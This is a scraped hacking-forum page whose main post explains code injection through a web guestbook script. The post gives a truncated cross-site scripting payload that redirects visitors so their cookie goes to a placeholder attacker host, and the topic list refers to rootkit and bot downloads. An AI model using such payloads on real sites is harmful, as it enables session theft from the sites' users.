Log in

I forgot my password

Search
 
 

Display results as :
 


Rechercher Advanced Search

Keywords

Latest topics
» IRC Server: IRC.HackersPlanet.Org
Code Injection Usages EmptyMon Jul 18, 2011 5:28 am by JeSTeR

» Getting Someone's IP By One Single Link Click
Code Injection Usages EmptySat Nov 20, 2010 4:02 pm by TR0J4NX

» Request Info
Code Injection Usages EmptyWed Sep 16, 2009 11:33 pm by JeSTeR

» winagent.exe
Code Injection Usages EmptyMon Aug 31, 2009 9:13 pm by JeSTeR

» sissiBOT.exe
Code Injection Usages EmptyMon Aug 31, 2009 8:42 pm by JeSTeR

» Posting Rules
Code Injection Usages EmptyMon Aug 31, 2009 8:30 pm by JeSTeR

» There Are Hidden Posts Only Members Can Access
Code Injection Usages EmptySat Aug 22, 2009 10:05 pm by JeSTeR

» Rules For Posting
Code Injection Usages EmptyWed Aug 19, 2009 6:35 pm by Shikamaru

» RootKit Downloads
Code Injection Usages EmptySat Jul 11, 2009 9:34 pm by JeSTeR

Most active topic starters
JeSTeR
Code Injection Usages I_vote_lcapCode Injection Usages I_voting_barCode Injection Usages I_vote_rcap 
Admin
Code Injection Usages I_vote_lcapCode Injection Usages I_voting_barCode Injection Usages I_vote_rcap 
Shikamaru
Code Injection Usages I_vote_lcapCode Injection Usages I_voting_barCode Injection Usages I_vote_rcap 
TR0J4NX
Code Injection Usages I_vote_lcapCode Injection Usages I_voting_barCode Injection Usages I_vote_rcap 

Navigation
 Portal
 Index
 Memberlist
 Profile
 FAQ
 Search
Social bookmarking

Social bookmarking digg  Social bookmarking delicious  Social bookmarking reddit  Social bookmarking stumbleupon  Social bookmarking slashdot  Social bookmarking yahoo  Social bookmarking google  Social bookmarking blogmarks  Social bookmarking live      

Bookmark and share the address of H4CK3D.US on your social bookmarking website

Bookmark and share the address of H4CK3D.US on your social bookmarking website

RSS feeds


Yahoo! 
MSN 
AOL 
Netvibes 
Bloglines 



Code Injection Usages

Go down

Code Injection Usages Empty Code Injection Usages

Post  JeSTeR on Thu Jan 08, 2009 2:22 pm

Overview and example

A web server has a "Guest book" script, which accepts small messages from users, and typically receives messages such as

Nice site!

However a malicious person may know of a code injection vulnerability in the "Guest book", and enters a message such as

Nice Site, I think I'll take it.><script>document.location='http://some_attacker/cookie.cgi?' +document
JeSTeR
JeSTeR
Admin

Age : 36
Posts : 133
Join date : 2008-09-27
Location : Earth

Back to top Go down

Back to top

- Similar topics

 
Permissions in this forum:
You cannot reply to topics in this forum